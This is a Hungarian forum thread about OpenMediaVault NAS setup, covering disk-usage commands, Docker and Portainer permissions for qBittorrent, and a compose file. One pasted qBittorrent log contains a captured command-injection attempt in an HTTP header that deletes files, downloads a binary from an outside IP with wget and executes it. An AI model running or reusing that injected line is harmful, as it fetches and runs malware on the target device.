-
IT café
Új hozzászólás Aktív témák
-
stigma
addikt
válasz szpeti40 #20250 üzenetére
Hi, igaz kb 1 éve volt,de már elfelejtettem a parancsokat, köszi a segítséget.
Ha kiadom az általad megadott parancsot (du -shc /*), és van olyan mappa amit a rendszer baghajtóra listáz, hogyan tudom szelektíven törölni a benne lévő fájlokat?
MC-t ugye feltettem, de nem érem el a rendszer meghajtó fájljait. kell esetleg bármiféle plugin-t feltennem? vagy csak szimplán a /srv alatt meg kéne találom a rendszer mappákat.
....iPhone 13 / iPad 9th Gen. Wifi 64GB...
-
stigma
addikt
válasz TheMiller #20252 üzenetére
Valami ilyesmit telepítettem az extraból, de mivel kevés időm volt ránézni, restart nem volt ami gondolom kellett volna.
Gondolom ezek után ahogy a dokumentáció írja (Plugins — openmediavault 6.x.y documentation) azt a mappát osszam meg, amelyik a legnagyobb méretű, hogy tudjak törölni belőle.
-
addikt
válasz stigma #20251 üzenetére
"MC-t ugye feltettem, de nem érem el a rendszer meghajtó fájljait."
Ezt hogy érted? Ha ssh-n rámész a szerverre konkrétan a rendszermeghajtót látod."kell esetleg bármiféle plugin-t feltennem?"
Nem"vagy csak szimplán a /srv alatt meg kéne találom a rendszer mappákat."
Nem, előbb írtam le, hogy a /srv alatt csak a felcsatolt lemezeket látod, a rendszermeghajtód nem lesz ott.Swift 1.3 GLX, Garmin Fēnix 6s, EOS R, Dell T110 II, iPad Pro, iPhone 15 Pro, Unifi
-
stigma
addikt
válasz szpeti40 #20254 üzenetére
Hi, köszi a képet, lehet rosszul fogalmaztam amúgy.
SSH-n MC-t feltettem majd ugye ,,mc" paranccsal elmindítom.
A képen látható összes mappát látom, viszont ha a rendszer partición lévő adatokat akartam megnézni, és úgy emlékeztem régen ezt lehetett megtenni a /dev vagy /srv alatt.
/srv alá ugye a felmountolt meghajtókat tudom tenni, mint például a HDD-t ami ugye benne van.Nekem annú úgy rémlett OMV5 vagy 6 alatt, hogy a rendszermeghajtóm fájljait én mint admin látom, és ha logokat vagy fájlokat kell törölni a rendszer particióról akkor simán ment asszem..Igaz ez nem most volt
Itt az érdekelt volna engem, ha a te parancsoddal kilistázom hol vannak a nagymérerű fájlok, amiket törölni kell akkor hogyan tovább.
Bocs ha hülyeséget kérdezem, de annó emlékeim szerint automatikusan8 elértem régebben midnent SSH-n vagy MC-ben minden mókolás nélkül --> SSD-n a rendszermeghajtó fájljait vagy felmountolt HDD-et, ugye ezutóbbi sikeresen megvan, de nem ott van a hiba.
[ Szerkesztve ]
-
addikt
válasz stigma #20255 üzenetére
"Itt az érdekelt volna engem, ha a te parancsoddal kilistázom hol vannak a nagymérerű fájlok, amiket törölni kell akkor hogyan tovább."
Ott látod ugye, hogy melyik mappa mekkora méretű és szépen mész végig a nagyméretű mappákon és nézed mi viszi el azt a rengeteg helyet.Vagy mc alatt nyomsz egy ctrl + space-t és akkor mutatja a mappa méretét, itt viszont sajnos egyessével végig kell menni, vagy ha egy mappába már bemész, akkor a ..-on nyomod akkor az almappákra végig kalkulálja.
[ Szerkesztve ]
Swift 1.3 GLX, Garmin Fēnix 6s, EOS R, Dell T110 II, iPad Pro, iPhone 15 Pro, Unifi
-
klrt
tag
Sziasztok!
Most ismerkedem az omv-vel.
A rendszert telepítettem(6.9.12-2 (Shaitan)), a docker, portainer fut. Telepítettem bele a qbittorrentet, (meghajtó felcsatolva, mappákat létrehoztam, egy user felhasználó van, jogosultsága van a mappákra), de valamiért nem indul el a letöltés. A próbált torrent pc-n rendesen letöltődik. Nem tudom mit rontottam el, vagy nem jól csináltam.
Tudtok segíteni, vagy kezdjek mindent újra? -
kutga
nagyúr
Kilépek a megosztott mappáktól és vissza lépek akkor viszont már nincs a pipa a rekurzívannál. Ez így jó?
Igen, jó így. Mi a hibaüzenet qbittorrent alatt? Nálam szinte mindig jogosultság probléma volt, amikor nem indult el a letöltés. Melyik felhasználó alatt fut a qbittorrent?
Let the Zone take me if I am.
-
-
klrt
tag
Nem tudom! Bocs, de tényleg nem értek hozzá! Amikor létrehoztam a portainer alatt szerintem csak qbittorrent nevet adtam neki.
pgid=100
puid=1000Létre kell hoznom egy admin felhasználót, vagy a Tomi ugye alapból az user csoportba kerül, ha minden igaz. Ezt az OMV-ben kell ugye? Lassan kezdek belekeveredni.
[ Szerkesztve ]
-
klrt
tag
Szerintem adtam neki.
Barkács Gabi videója alapján, ha jól emlékszem [link]
Mondjuk volt benne pár dolog ami nem volt tiszta. Ő csinált egy másik hálózatot, hogy minden a router hálózatába legyen, de nekem úgy a qbit kezelőfelülete sem jött be, ha jól emlékszem és vissza raktam arra amit alapból beállít a portainer.
A videóba 3:28 nál valahogy vissza megy a portainerben a qbittorrent continer beállításához és ott valami jogosultságokat mond. Én viszont nem tudok oda menni, nem találom a szerkesztési lehetőséget. Lehet rosszul vágta össze a videót és ezt már a konténer létrehozása előtt kellett volna a többi beállítással együtt megtenni?TheMiller
A jogosultságokat hogy tudom megnézni?
Elvileg a mappajogosultságok jók.Esetleg távolról valaki megnézné?
[ Szerkesztve ]
-
TheMiller
tag
Potrainerben ha stack-be írd be, hogy "network mode: host"
Omv User jogok: felhasználókezelés/felhasználók
Mappa jog: tárolás/megosztott mappák/ACL (4ik ikon), itt tudod userekhez is engedélyezni, valamint a tulajdonos és csoport mezők is lényeg (írás/olvasás/végrehajtás legyen), a "csere" és a "rekurzívan" legyen bepipálva
Ide érdemes felvenni azt a mappát amit a qbit a dockerben kezel és akkor grafikusan is állíthatod hozzá a jogokatÉn elengedném a barkács videót, nem értem minek ezt bonyolítani, új stackben hozd létre a konténert, a mappákat írd át benne, esetleg az usert, dátum zónát (TZ):
---
services:
qbittorrent:
image: lscr.io/linuxserver/qbittorrent:latest
container_name: qbittorrent
network mode: host
environment:
- PUID=1000
- PGID=1000
- TZ=Etc/UTC
- WEBUI_PORT=8080
volumes:
- /path/to/appdata/config:/config
- /path/to/downloads:/downloads
ports:
- 8080:8080
- 6881:6881
- 6881:6881/udp
restart: unless-stopped[ Szerkesztve ]
The World is Yours
-
klrt
tag
válasz TheMiller #20274 üzenetére
Le állítottam a qbittorentet. a stack-ba létrehozás qbit nevet adtam neki bemásoltam amit írtál, a mappákat átírtam. Így nem engedi létrehozni. Nem aktív a gomb.
BlackJack21
Remélem erre gondolszbool Http::RequestParser::parseRequestLine(const QString&) invalid http header: "time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;"
Http::RequestParser::ParseResult Http::RequestParser::doParse(const QByteArray&) header parsing error
Rossz Http kérés, socket bezárása. IP: ::ffff:217.30.170.214
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:194.48.250.97. Módszer: "CONNECT"
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:194.48.250.97. Módszer: "CONNECT"
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:91.92.252.45. Módszer: "CONNECT"
Rossz Http kérési módszer, socket bezárása. IP: ::ffff:199.45.155.18. Módszer: "PRI"
Catching signal: SIGTERM
Exiting cleanly[ Szerkesztve ]
-
addikt
Mostanában volt több diszk telítettséges kérdés is itt és mivel találtam egy hasznos programot erre, ezért megosztom.
ncdu
Telepítése nagyon egyszerű, ssh alólapt install ncdu
és fent is van.
Jobbra nyíllal belelépsz a könyvtárba, balra nyíllal meg vissza.
Indítása:ncdu -x /
Így a -x kapcsolóval nem számolja a linkeléseket, valamint a gyökérkönyvtárból indul.
Swift 1.3 GLX, Garmin Fēnix 6s, EOS R, Dell T110 II, iPad Pro, iPhone 15 Pro, Unifi
-
csiak
tag
Sziasztok,
OMV6.9.13-on omv-extras telepítése után a dockert nem lehet elinidítani:
Mit ronthatok el? Köszi!"Sok loot disznót győz!"
-
tata93
tag
Sziasztok!
Próbáltam feltelepíteni az omv-t (7.0-20), de a Hálózati hardver felderítésénél azt írja, hogy: Nem észleltem Ethernet kártyát. Ez mégis hogy lehetséges? Mit tudok csinálni azzal, hogy felismerje? Hp ProBook 6475b-re tenném fel.
Köszi a segítséget.
[ Szerkesztve ]
-
sztanozs
veterán
Ejj, a diszk összefogta magát az OMV alatt, kereshetek most másik lemezt, es lehet mindent újratelepíteni
JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
Kíérletezgetek a NAS-sal. Probálok még alkalmazás területet találni, ami érdekel és hasznos.
Mennyire bonyulult ezt a NextCloud beállítani, feltelepíteni Portainer-ben?
Mennyire használható dolog ez?Főleg a NAS távoli elérése miatt érdekel a dolog.
Mik a tapasztalatok?
[ Szerkesztve ]
-
sztanozs
veterán
válasz szpeti40 #20285 üzenetére
rPI4-en fut, felraktam egy 64-bites debianra... meglátjuk meddig bírja memoiriakartyaval. A lemez kb 2 evet birt...
Egesz mas ez a 6-os, mint a 4-es volt… hol talalom a dockert? A wiki szerint az extras-nak telepulni kell alapbol ha rpi-re rakom fel, de az extras menu tok ures par opciotol eltekintve…
[ Szerkesztve ]
JOGI NYILATKOZAT: A bejegyzéseim és hozzászólásaim a személyes véleményemet tükrözik; ezek nem tekinthetők a munkáltatóm hivatalos állásfoglalásának...
-
sztanozs
veterán
dyndns kliens adjon/modul nincs?
-
sztanozs
veterán
Na, egy fel nap szíváss után (es szerencsére mivel volt omvbackup folderem), igy a docker configok nagy részét (szerencsére a a qbt-vel együtt) vissza tudtam állítani omv6-on...
-
tata93
tag
válasz tradeelek11 #20295 üzenetére
Köszi. Holnap igyekszem megnézni.
viszont eddig biztos hogy volt ipje a gépnek windows alatt. Most viszont ugye nincs is alatta semmi op rendszer.[ Szerkesztve ]
-
benceyce
tag
Sziasztok!
Valaki rakott már fel esetleg tabletre vagy okostelefonra OMV-t?
Lehetséges?Cinikus belátásom, hogy hamarosan kiírtjuk magunkat az eldobható luxuscikkek birtoklásáért
-
Multibit
nagyúr
-
-
Új hozzászólás Aktív témák
Figyelem!
Megjelent a Debian 10-re épülő OMV 5 stabil kiadása.
Új telepítésre ez a verzió ajánlott.
- Számlás!Steam,EA,Epic és egyébb játékok Pc-re vagy XBox!
- Star Wars Outlaws GeForce RTX 40 Bundle - lepd meg magad!
- Játékkulcsok olcsón: Steam, Uplay, GoG, Origin, Xbox, PS stb.
- Védje meg számítógépét a vírusoktól!
- Microsoft licencek KIVÉTELES ÁRON AZONNAL - UTALÁSSAL IS AUTOMATIKUS KÉZBESÍTÉS - Windows és Office
Állásajánlatok
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest